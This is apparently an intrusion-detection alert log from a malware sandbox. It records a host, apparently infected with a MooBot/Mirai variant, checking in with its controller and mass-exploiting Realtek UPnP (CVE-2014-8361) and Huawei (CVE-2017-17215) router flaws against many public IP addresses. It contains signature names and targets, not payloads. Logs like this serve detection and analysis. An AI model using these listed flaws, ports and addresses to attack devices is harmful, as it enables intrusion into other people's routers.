                                                07/20/24-23:06:17.383428TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613605852869192.168.2.1494.134.128.158
                                                07/20/24-23:05:48.780090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4190837215192.168.2.14197.33.136.186
                                                07/20/24-23:05:56.802194TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614221052869192.168.2.14119.6.68.125
                                                07/20/24-23:06:21.994838TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615749252869192.168.2.14122.46.154.215
                                                07/20/24-23:05:36.354373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4346237215192.168.2.14157.85.17.185
                                                07/20/24-23:05:36.005292TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615323852869192.168.2.14141.231.43.221
                                                07/20/24-23:05:58.803048TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5702052869192.168.2.14192.95.119.34
                                                07/20/24-23:05:36.338927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3308037215192.168.2.14157.19.208.204
                                                07/20/24-23:05:45.392754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5015237215192.168.2.1441.246.240.88
                                                07/20/24-23:05:52.554950TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24051652869192.168.2.1431.227.142.212
                                                07/20/24-23:06:50.384864TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5324052869192.168.2.14153.7.133.0
                                                07/20/24-23:05:46.372687TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615855652869192.168.2.14106.160.141.160
                                                07/20/24-23:05:48.762153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3394037215192.168.2.1441.252.117.170
                                                07/20/24-23:06:05.461008TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5639052869192.168.2.1420.62.77.8
                                                07/20/24-23:05:57.960840TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4981052869192.168.2.14179.72.247.135
                                                07/20/24-23:06:00.601619TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4587252869192.168.2.1466.234.95.91
                                                07/20/24-23:05:37.476168TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25205452869192.168.2.1468.10.183.207
                                                07/20/24-23:06:28.980707TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5968852869192.168.2.14135.165.112.79
                                                07/20/24-23:05:44.364513TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6017252869192.168.2.14205.187.149.67
                                                07/20/24-23:05:44.351081TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4011252869192.168.2.14118.15.81.240
                                                07/20/24-23:05:37.447452TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4575252869192.168.2.14147.14.244.79
                                                07/20/24-23:05:34.627062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4320637215192.168.2.14133.62.206.236
                                                07/20/24-23:05:42.238265TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5511637215192.168.2.14197.6.163.201
                                                07/20/24-23:05:58.995753TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24085252869192.168.2.14194.151.47.138
                                                07/20/24-23:05:42.143657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5577237215192.168.2.148.141.189.185
                                                07/20/24-23:05:44.946132TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4941452869192.168.2.14182.111.218.236
                                                07/20/24-23:06:04.995860TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4388852869192.168.2.14170.158.29.228
                                                07/20/24-23:05:47.103906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3306637215192.168.2.14201.37.202.18
                                                07/20/24-23:05:58.849532TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615174252869192.168.2.14174.132.14.103
                                                07/20/24-23:05:57.544145TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5373052869192.168.2.1432.217.101.126
                                                07/20/24-23:06:29.266425TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5080852869192.168.2.14165.192.185.217
                                                07/20/24-23:05:34.664378TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4998037215192.168.2.14197.21.229.2
                                                07/20/24-23:06:02.283865TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5062252869192.168.2.14209.239.99.54
                                                07/20/24-23:05:46.119639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5864237215192.168.2.14157.243.128.36
                                                07/20/24-23:06:00.460027TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5710252869192.168.2.1414.19.59.241
                                                07/20/24-23:05:52.682403TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4677452869192.168.2.14105.215.161.3
                                                07/20/24-23:05:56.994750TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4901652869192.168.2.14129.7.141.158
                                                07/20/24-23:05:45.269253TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3280052869192.168.2.14207.90.148.106
                                                07/20/24-23:06:50.384864TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4473852869192.168.2.1419.139.70.112
                                                07/20/24-23:06:14.957724TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615206252869192.168.2.14159.189.153.232
                                                07/20/24-23:05:52.687825TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4566452869192.168.2.14161.199.46.212
                                                07/20/24-23:06:03.718240TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4010852869192.168.2.1484.62.152.144
                                                07/20/24-23:05:58.216480TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613980652869192.168.2.14210.62.250.25
                                                07/20/24-23:05:58.954404TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23381652869192.168.2.1499.232.17.115
                                                07/20/24-23:06:51.995876TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25300252869192.168.2.14207.13.1.7
                                                07/20/24-23:05:37.590968TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23570252869192.168.2.1459.135.63.153
                                                07/20/24-23:06:19.603798TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4249852869192.168.2.14150.31.127.80
                                                07/20/24-23:05:47.345531TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613851052869192.168.2.1445.125.38.2
                                                07/20/24-23:06:07.479533TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4925252869192.168.2.14185.163.101.130
                                                07/20/24-23:05:40.433285TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25175452869192.168.2.1497.213.55.119
                                                07/20/24-23:05:56.907864TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5875852869192.168.2.14179.61.198.141
                                                07/20/24-23:05:46.572869TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614047052869192.168.2.1417.65.162.120
                                                07/20/24-23:05:52.528818TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5654252869192.168.2.1499.194.98.130
                                                07/20/24-23:05:56.922875TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615558052869192.168.2.14208.210.138.41
                                                07/20/24-23:06:24.616747TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5926852869192.168.2.14119.143.63.56
                                                07/20/24-23:05:45.435096TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4016837215192.168.2.1441.103.52.46
                                                07/20/24-23:05:59.096689TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23858252869192.168.2.14102.137.240.137
                                                07/20/24-23:06:15.234951TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615761252869192.168.2.1451.62.238.64
                                                07/20/24-23:05:57.161094TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6034452869192.168.2.14199.41.219.25
                                                07/20/24-23:05:58.262546TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615049452869192.168.2.1451.105.4.160
                                                07/20/24-23:05:48.780090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4740837215192.168.2.1441.13.83.167
                                                07/20/24-23:05:47.331187TCP2030490ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)469142466192.168.2.1415.235.203.214
                                                07/20/24-23:05:57.559320TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5311452869192.168.2.14133.109.89.140
                                                07/20/24-23:05:39.754007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5803637215192.168.2.1476.23.99.240
                                                07/20/24-23:05:50.510455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4769437215192.168.2.1441.192.149.224
                                                07/20/24-23:05:37.476168TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5375052869192.168.2.1437.150.102.99
                                                07/20/24-23:05:57.210836TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4416252869192.168.2.1467.151.109.138
                                                07/20/24-23:05:56.056582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5187437215192.168.2.14157.197.82.28
                                                07/20/24-23:06:01.961036TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4088052869192.168.2.1496.35.224.207
                                                07/20/24-23:06:04.552004TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24722852869192.168.2.14109.153.141.128
                                                07/20/24-23:05:45.468009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5811837215192.168.2.14157.114.227.107
                                                07/20/24-23:05:59.262795TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4406652869192.168.2.1499.193.81.64
                                                07/20/24-23:05:55.694402TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615358852869192.168.2.14134.140.38.1
                                                07/20/24-23:06:14.645434TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614774852869192.168.2.14164.153.241.195
                                                07/20/24-23:05:37.468656TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4731452869192.168.2.1451.55.196.22
                                                07/20/24-23:05:52.503773TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3917852869192.168.2.14202.78.132.130
                                                07/20/24-23:06:11.607832TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4171252869192.168.2.14201.80.203.210
                                                07/20/24-23:06:23.534447TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5299452869192.168.2.14141.143.83.70
                                                07/20/24-23:06:33.204459TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3314852869192.168.2.14110.56.95.238
                                                07/20/24-23:05:37.447452TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25376852869192.168.2.14212.239.177.163
                                                07/20/24-23:06:10.964001TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3556452869192.168.2.14150.203.239.55
                                                07/20/24-23:05:57.164213TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613748452869192.168.2.14203.188.134.128
                                                07/20/24-23:06:55.587260TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4386452869192.168.2.1459.45.228.144
                                                07/20/24-23:06:23.120505TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613516652869192.168.2.14167.116.191.121
                                                07/20/24-23:05:57.477468TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613882252869192.168.2.14141.93.218.139
                                                07/20/24-23:06:54.482380TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4081052869192.168.2.14192.59.185.246
                                                07/20/24-23:05:58.549030TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5570052869192.168.2.14148.242.100.157
                                                07/20/24-23:05:36.325898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5942237215192.168.2.14157.42.88.138
                                                07/20/24-23:05:35.381718TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4578052869192.168.2.1451.55.196.22
                                                07/20/24-23:05:33.861759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5699037215192.168.2.14197.153.130.241
                                                07/20/24-23:05:39.035942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5015837215192.168.2.14157.57.36.175
                                                07/20/24-23:05:45.076298TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615210652869192.168.2.14146.2.42.140
                                                07/20/24-23:05:46.088778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3630237215192.168.2.14197.78.40.3
                                                07/20/24-23:05:59.136809TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4706052869192.168.2.14181.39.217.252
                                                07/20/24-23:06:16.626162TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614130452869192.168.2.14198.203.207.18
                                                07/20/24-23:06:09.610819TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4379052869192.168.2.14137.55.138.211
                                                07/20/24-23:05:52.486069TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5095652869192.168.2.14219.121.248.52
                                                07/20/24-23:05:34.652423TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5481837215192.168.2.14197.145.253.73
                                                07/20/24-23:05:42.136712TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4455437215192.168.2.148.254.253.79
                                                07/20/24-23:06:03.111365TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5466652869192.168.2.14158.91.168.95
                                                07/20/24-23:05:35.800738TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3281452869192.168.2.14205.8.145.6
                                                07/20/24-23:05:48.763322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4908837215192.168.2.1476.87.51.211
                                                07/20/24-23:06:06.437928TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614217452869192.168.2.14132.11.86.47
                                                07/20/24-23:05:40.334659TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3434252869192.168.2.14166.187.21.85
                                                07/20/24-23:06:03.002504TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23811852869192.168.2.14100.254.105.120
                                                07/20/24-23:06:01.860812TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613969452869192.168.2.1458.146.126.203
                                                07/20/24-23:06:29.433951TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23766052869192.168.2.14175.208.49.127
                                                07/20/24-23:06:02.812092TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23457252869192.168.2.14139.133.137.186
                                                07/20/24-23:05:57.554556TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5638852869192.168.2.1432.221.18.235
                                                07/20/24-23:05:37.443569TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3900052869192.168.2.1420.226.134.71
                                                07/20/24-23:05:45.439166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4050837215192.168.2.1441.2.150.17
                                                07/20/24-23:06:04.458817TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25772452869192.168.2.14152.17.67.73
                                                07/20/24-23:06:04.575596TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615366452869192.168.2.14218.158.30.202
                                                07/20/24-23:05:36.343227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5877437215192.168.2.14149.234.88.62
                                                07/20/24-23:05:57.032993TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6099452869192.168.2.14223.229.22.78
                                                07/20/24-23:06:02.125044TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4053852869192.168.2.1466.132.67.191
                                                07/20/24-23:05:50.537576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4345037215192.168.2.14197.26.161.246
                                                07/20/24-23:05:58.066315TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25202652869192.168.2.14130.56.1.95
                                                07/20/24-23:05:47.107735TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4596837215192.168.2.14197.90.150.78
                                                07/20/24-23:05:48.801547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5799037215192.168.2.14197.117.178.198
                                                07/20/24-23:05:57.133659TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24594852869192.168.2.1499.108.70.8
                                                07/20/24-23:05:48.748554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4766437215192.168.2.14197.243.41.83
                                                07/20/24-23:05:33.852857TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3562637215192.168.2.1475.49.195.139
                                                07/20/24-23:05:39.039093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4743637215192.168.2.1473.84.136.8
                                                07/20/24-23:07:08.490661TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3408452869192.168.2.14145.10.127.230
                                                07/20/24-23:05:58.922584TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4888652869192.168.2.1460.41.178.30
                                                07/20/24-23:06:00.736310TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614947452869192.168.2.14161.128.195.195
                                                07/20/24-23:06:01.207184TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6040252869192.168.2.1464.219.147.54
                                                07/20/24-23:06:06.640556TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616040252869192.168.2.14151.106.207.115
                                                07/20/24-23:05:58.834336TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3721252869192.168.2.1492.72.166.156
                                                07/20/24-23:06:03.476247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5162637215192.168.2.1441.102.238.86
                                                07/20/24-23:06:02.199925TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613798052869192.168.2.1423.110.68.249
                                                07/20/24-23:06:03.297548TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614913452869192.168.2.1491.181.24.50
                                                07/20/24-23:06:24.805050TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5712252869192.168.2.1442.207.160.235
                                                07/20/24-23:05:42.257816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4809837215192.168.2.14119.42.235.35
                                                07/20/24-23:05:58.369729TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3653252869192.168.2.14173.137.64.120
                                                07/20/24-23:05:33.863826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4039637215192.168.2.14174.135.199.129
                                                07/20/24-23:05:42.233806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3747837215192.168.2.14157.161.69.81
                                                07/20/24-23:05:48.763323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5388037215192.168.2.1441.16.128.177
                                                07/20/24-23:05:36.580139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3817437215192.168.2.14157.0.36.222
                                                07/20/24-23:05:38.191070TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614164652869192.168.2.14191.244.73.243
                                                07/20/24-23:06:02.906267TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24394252869192.168.2.14106.37.253.180
                                                07/20/24-23:05:58.771763TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5423052869192.168.2.1473.137.146.119
                                                07/20/24-23:05:57.023606TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25270052869192.168.2.1467.18.202.14
                                                07/20/24-23:05:40.353037TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24394252869192.168.2.1490.16.174.124
                                                07/20/24-23:05:40.451363TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23791452869192.168.2.14105.239.125.24
                                                07/20/24-23:05:46.822853TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4241852869192.168.2.14139.219.69.26
                                                07/20/24-23:05:40.365777TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5496252869192.168.2.14125.204.161.195
                                                07/20/24-23:05:58.700908TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613480252869192.168.2.14216.40.228.188
                                                07/20/24-23:06:11.425707TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614453052869192.168.2.14165.67.93.131
                                                07/20/24-23:05:56.086216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4617037215192.168.2.14197.124.245.140
                                                07/20/24-23:06:08.403626TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615170252869192.168.2.14132.226.61.35
                                                07/20/24-23:05:37.454427TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6017252869192.168.2.14137.134.252.4
                                                07/20/24-23:05:47.103906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5984437215192.168.2.1441.240.51.232
                                                07/20/24-23:05:52.478142TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25655252869192.168.2.14147.148.71.168
                                                07/20/24-23:05:52.639265TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4556652869192.168.2.1439.123.223.174
                                                07/20/24-23:05:48.777005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4247637215192.168.2.1427.238.110.145
                                                07/20/24-23:05:40.413672TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4267652869192.168.2.1438.198.246.87
                                                07/20/24-23:06:01.813206TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4922052869192.168.2.1478.254.150.241
                                                07/20/24-23:06:30.542349TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4176252869192.168.2.14168.170.27.252
                                                07/20/24-23:06:12.648653TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5712852869192.168.2.1496.131.9.180
                                                07/20/24-23:05:45.304282TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5435652869192.168.2.1495.213.237.81
                                                07/20/24-23:05:57.114018TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5812052869192.168.2.1437.110.135.88
                                                07/20/24-23:07:03.190387TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4499852869192.168.2.1499.193.81.64
                                                07/20/24-23:05:35.184596TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615536052869192.168.2.14176.224.174.174
                                                07/20/24-23:05:52.445659TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24762252869192.168.2.14117.27.246.191
                                                07/20/24-23:05:38.971654TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5485237215192.168.2.14197.107.17.120
                                                07/20/24-23:05:38.102642TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615098652869192.168.2.14100.202.15.240
                                                07/20/24-23:05:56.124566TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3281437215192.168.2.14157.232.134.148
                                                07/20/24-23:05:33.830838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4938837215192.168.2.14157.196.44.133
                                                07/20/24-23:05:59.239089TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4571452869192.168.2.14114.84.217.191
                                                07/20/24-23:06:21.074396TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4192652869192.168.2.14150.55.177.42
                                                07/20/24-23:05:46.549584TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6056452869192.168.2.1498.8.249.105
                                                07/20/24-23:06:11.535629TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614338252869192.168.2.14103.142.215.217
                                                07/20/24-23:05:48.858199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4491837215192.168.2.14221.110.118.206
                                                07/20/24-23:05:52.459685TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25773852869192.168.2.1463.16.203.38
